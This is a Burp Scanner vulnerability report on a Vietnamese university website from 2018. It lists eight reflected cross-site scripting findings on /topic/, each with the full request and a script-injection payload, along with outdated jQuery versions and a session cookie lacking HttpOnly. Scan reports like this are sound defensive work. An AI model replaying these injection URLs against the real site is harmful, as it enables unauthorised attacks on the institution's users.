scan website http://www.tgu.edu.vn/

Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.



  Confidence
  CertainFirmTentativeTotal
SeverityHigh8008
Medium7007
Low1102
Information121013

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

  Number of issues
  01234567
SeverityHigh
 
Medium
 
Low
 

Contents


1. Cross-site scripting (reflected)
Next 

There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
  • Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

References

Vulnerability classifications



1.1. http://www.tgu.edu.vn/topic/ [11387 parameter]
Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11387 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload mym2a"><script>alert(1)</script>g72qd was submitted in the 11387 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11387=mym2a"><script>alert(1)</script>g72qd HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=8hgqdfquccnug7lp9itk05d2t2;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:25 GMT
Connection: close
Content-Length: 16526

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11387=mym2a"><script>alert(1)</script>g72qd"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.2. http://www.tgu.edu.vn/topic/ [11408 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11408 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload xdy9r"><script>alert(1)</script>erfyh was submitted in the 11408 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11408=xdy9r"><script>alert(1)</script>erfyh HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:52:24 GMT
Connection: close
Content-Length: 16924

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=xdy9r"><script>alert(1)</script>erfyh"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.3. http://www.tgu.edu.vn/topic/ [11526 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11526 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload nudkn"><script>alert(1)</script>iip5q was submitted in the 11526 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11526=nudkn"><script>alert(1)</script>iip5q HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=gerbkpeqs7b1ruioj2u5m1i0k6;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:56:21 GMT
Connection: close
Content-Length: 25851

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11526=nudkn"><script>alert(1)</script>iip5q"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.4. http://www.tgu.edu.vn/topic/ [11539 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11539 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload pxout"><script>alert(1)</script>f2pqp was submitted in the 11539 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11539=pxout"><script>alert(1)</script>f2pqp HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=i336pgatekcsu1rjlqqrm8npn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:56:37 GMT
Connection: close
Content-Length: 36629

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11539=pxout"><script>alert(1)</script>f2pqp"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.5. http://www.tgu.edu.vn/topic/ [11542 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11542 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload uc50o"><script>alert(1)</script>exh0d was submitted in the 11542 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11542=uc50o"><script>alert(1)</script>exh0d HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=pu4sbkvs93q4posm0ci2b9t4t7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:51 GMT
Connection: close
Content-Length: 23619

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11542=uc50o"><script>alert(1)</script>exh0d"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.6. http://www.tgu.edu.vn/topic/ [11556 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11556 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload jyqbj"><script>alert(1)</script>eyz6y was submitted in the 11556 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11556=jyqbj"><script>alert(1)</script>eyz6y HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=ph64imi6u9t1hdnakjoclp0gn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:57 GMT
Connection: close
Content-Length: 27028

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556=jyqbj"><script>alert(1)</script>eyz6y"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.7. http://www.tgu.edu.vn/topic/ [8044 parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 8044 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload oiv5t"><script>alert(1)</script>kuwhw was submitted in the 8044 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?8044=oiv5t"><script>alert(1)</script>kuwhw HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=dtqntjp4qof02c2mrhthnvhbp5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 15:00:47 GMT
Connection: close
Content-Length: 16291

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?8044=oiv5t"><script>alert(1)</script>kuwhw"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.8. http://www.tgu.edu.vn/topic/ [name of an arbitrarily supplied URL parameter]
Previous  Next 

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload l0vgp"><script>alert(1)</script>pxvdh was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11408=&l0vgp"><script>alert(1)</script>pxvdh=1 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:10:52 GMT
Connection: close
Content-Length: 16927

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=&l0vgp"><script>alert(1)</script>pxvdh=1"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-bor
...[SNIP]...
2. Vulnerable version of the library 'jquery' found
Previous  Next 

There are 7 instances of this issue:


2.1. http://www.tgu.edu.vn/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET / HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=nua92uhn6kujo9hf2h8ie0f3n1; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:37:40 GMT
Connection: close
Content-Length: 50699

<!DOCTYPE html>
<html ng-app="">
<head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Rem
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.2. http://www.tgu.edu.vn/dept/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/?7= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=6dq9h8q8fb17m85h8r0csi7ci1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:38 GMT
Connection: close
Content-Length: 30010

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.3. http://www.tgu.edu.vn/dept/topic/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/topic/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/topic/?6826= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=40dp26uc2c06i0fe7an6f7dvc6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:40:08 GMT
Connection: close
Content-Length: 26385

<!DOCTYPE html>
<html ng-app="">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.4. http://www.tgu.edu.vn/dept/topics/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/topics/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/topics/?0.292.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=t4eaoff04u3jc8e13kajkjhk27

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:40:11 GMT
Connection: close
Content-Length: 25264

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.5. http://www.tgu.edu.vn/dstt/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dstt/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.12.4.min has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 3.0.0-beta1 (between 1.12.3 and 3.0.0-beta1)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dstt/ HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=gc1lt2o1pii04nm5kvp7ipnr56

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:43:36 GMT
Connection: close
Content-Length: 3462

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ng-app="">

<head>
<meta http-equiv="content-type" content="text/
...[SNIP]...
<script src="https://code.jquery.com/jquery-1.12.4.min.js">
...[SNIP]...
2.6. http://www.tgu.edu.vn/topic/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.7. http://www.tgu.edu.vn/topics/
Previous  Next 

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topics/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)
Other considerations
The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered false positive.
The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
3. Cookie without HttpOnly flag set
Previous  Next 

Summary

Severity:  Low
Confidence:  Firm
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

References

Vulnerability classifications

Request

GET / HTTP/1.1
Host: www.tgu.edu.vn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
DNT: 1
